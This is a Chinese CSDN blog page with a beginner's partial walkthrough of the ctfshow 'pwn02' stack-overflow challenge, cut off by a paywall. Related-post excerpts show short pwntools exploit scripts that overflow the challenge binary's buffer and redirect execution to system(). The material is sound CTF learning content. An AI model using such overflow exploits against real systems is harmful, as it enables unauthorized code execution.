Ctfshow pwn 02(自己做出的第一道pwn题)

最新推荐文章于 2024-10-09 16:16:24 发布
最新推荐文章于 2024-10-09 16:16:24 发布
阅读量5.4k 收藏 30
点赞数 14
分类专栏: ctf学习 pwn 文章标签: python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64875092/article/details/121729970
版权
本文是作者初次解决CTF Pwn题目的记录,适合入门者。介绍了如何使用ida、gdb、cyclic等工具,通过栈溢出漏洞获取shell,最终解密flag。详细讲解了从下载题目文件、检查文件属性、运行程序、生成和利用payload到获得flag的完整过程。
摘要由CSDN通过智能技术生成

算是一篇第一次做出pwn题的日记了!

本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~

有许多写的不严谨或无脑的地方请多包涵!

其中有许多我在做题时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去)

现在开始!

首先第一步,来到ctfshow的网站,找到这道pwn02

之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去

得到nc pwn.challenge.ctf.show 28053 

(记住它后面会有用!而且这段数据会随着每次Launch而不同!)

然后点击stack,下载本题所需的文件

之后我们来到虚拟机,将这个文件复制粘贴或拖动进虚拟机

(在虚拟机home里可以找到它)

 

 然后我们用Ctrl+Alt+T打开操作页面

这里我们需要进行四步操作

1.输入cd Desktop/,打开主菜单

2.输入file +拖动stack文件到file后(回车运行)

    根据后面的32_bit我们可以知道这是一个32位文件,这将决定我们用ida32还是ida64来打开它

3.checksec +拖动stack文件到chec

最低0.47元/天 解锁文章
TJNing1204
关注
专栏目录
ctfshow pwn2
qq_39980610的博客
08-19 833
pwn2
ctfshow pwn
zip471642048的博客
06-04 532
ctfshow pwn系列
ctfshow pwn——PWN签到pwn02
qq_55233040的博客
01-24 5492
PWNPWN签到pwn02 PWN签到 nc连上就行了 pwn02 check一下是32位,用32位ida打开看看 很直白的pwnme函数 9字节的空间读入了50字节,产生了栈溢出 用pwndbg调试一下 可以看到ebp前读取了9个字节,而32位程序的ebp占用4个字节,所以eip被覆盖成为ddde 回到ida,找到system函数 system函数在stack函数中,找到stack函数的位置: 写脚本 from pwn import * io = remote("pwn.challeng
CTFSHOW-PWN入门-栈溢出(35-42)
最新发布
2402_84585385的博客
10-09 694
发现hint函数中存在system函数,useful函数存在sh,根据目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x80487BA。发现hint函数中存在system函数,useful函数存在sh,根据目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x400872。ctfshow函数中的,v1大小为14,而read函数读取大小为50,所以read函数存在栈溢出,使用cyclic计算栈偏移量为22。ctfshow函数中的read函数存在栈溢出,cyclic计算栈偏移量为18。
CTFSHOW PWN02
m0_74093152的博客
03-22 995
CTFSHOWPWN02
CTFshow PWN入门 pwn02
question55的博客
09-15 696
ctf pwn 栈溢出漏洞 ctf入门 ctfshow
Pwn_CTFShow_02
Trick的博客
11-08 647
Pwn_CTFShow_0101栈溢出之ret2text 01栈溢出之ret2text 很简单的一个栈溢出 直接IDA分析 从main函数跟进到welcome函数 get() 很明显的溢出 payload = 'a'*(0x80+8) 因为是64位的,所以后面要加上8 Shift+F12 发现/bin/sh 果然够简单的。。。 双击进去 再双击 找到地址 exp: from pwn import * p=remote('111.231.70.44',28072) payload='a'*(0
CTFshow pwn2
m0_72827793的博客
03-05 272
pwn2模仿加学习
ctfshow pwn7
qq_39980610的博客
08-22 569
pwn7
CTFshow-PWN入门-栈溢出pwn41~pwn48
weixin_63576152的博客
08-25 1696
本文主要详解CTFshow中pwn入门系列的栈溢出模块的其中x所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境。
CTFSHOW-PWN入门-前置基础(pwn13-pwn19)
2402_84133101的博客
04-14 385
如果不等于9就先执行real()函数,然后再执行system函数打印出flag,因此nc连接之后输入9,获得flag。IDA查看反汇编代码,看到case3有system(cat /ctfshow_flag)函数,但是sleep(0x1BF52u)语句要睡眠0x1BF52秒,换算成10进制就是114514秒,那就是31个小时,所以另求他法。使用gcc编译文件后,在当前目录下创建文件key,内容为CTFshow,运行编译后文件,获得flag。ld -s -o flag flag.o生成flag可执行文件。
CTFshow——Pwn(1)
Y_peak的博客
02-24 450
CTFshow——Pwn(1) 有点懒不想写write up了。只有exploit。 PWN签到 from pwn import * p = remote('xxx',xxx) p.interactive() pwn02 from pwn import * p =remote("pwn.chall.ctf.show",28006) p.sendline('a'*(0x9+4) + p32(0x0804850F)) p.interactive() pwn03 from pwn import * from
canary保护和pie保护的绕过
2301_79880074的博客
01-27 2047
今天通过三道例学习一下开启canary,pie保护的解方法。
ctfshow pwn3
qq_39980610的博客
08-19 603
所以如果我们知道 libc 中某个函数的地址,那么我们就可以确定该程序利用的 libc。此外,在得到 libc 之后,其实 libc 中也是有 /bin/sh 字符串的,所以我们可以一起获得 /bin/sh 字符串的地址。我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容。然后接受到的地址就是程序在libc中的地址我们就可以确定libc的版本和libc基址。函数在libc中的偏移都是固定的我们可以通过基址加偏移拿到函数地址和binsh字段。然后我们再构造rop链。
CTFshow-pwn入门-前置基础pwn29-pwn31
T1ngSh0w的博客
06-21 1741
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 2062
ctfshow pwn入门-前置基础pwn13-pwn19
PWN-02
2301_79215333的博客
02-03 751
ret2syscall 原理 顾名思义,ret to syscall,就是调用系统函数以达到getshell的目的 在计算中,系统调用是一种编程方式,计算机程序从该程序中向执行其的操作系统内核请求服务。这可能包括与硬件相关的服务(例如,访问硬盘驱动器),创建和执行新进程以及与诸如进程调度之类的集成内核服务进行通信。系统调用提供了进程与操作系统之间的基本接口。 至于系统调用在其中充当什么角色,稍后再看,现在我们要做的是:让程序调用execve(“/bin/sh”,NULL,NULL)函数即可拿到shell 相
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9847
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
CTFshow-webPWN
i_kei的博客
11-10 561
WEBpwn_1 将组件放置成如图所示 通电即可获得flag WEBpwn_2 将组件放置成如图所示 通电即可获得flag
ctfshow pwn02
09-22
ctfshow pwn02是一个鹏城实验室的pwn,它涉及到libc-2.31.so下off-by-null的漏洞利用。该目是在Linux平台下进行的,其中还考查了地址空间分布随机化(ASLR)的机制。具体来说,该目是一个堆漏洞利用目,需要...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值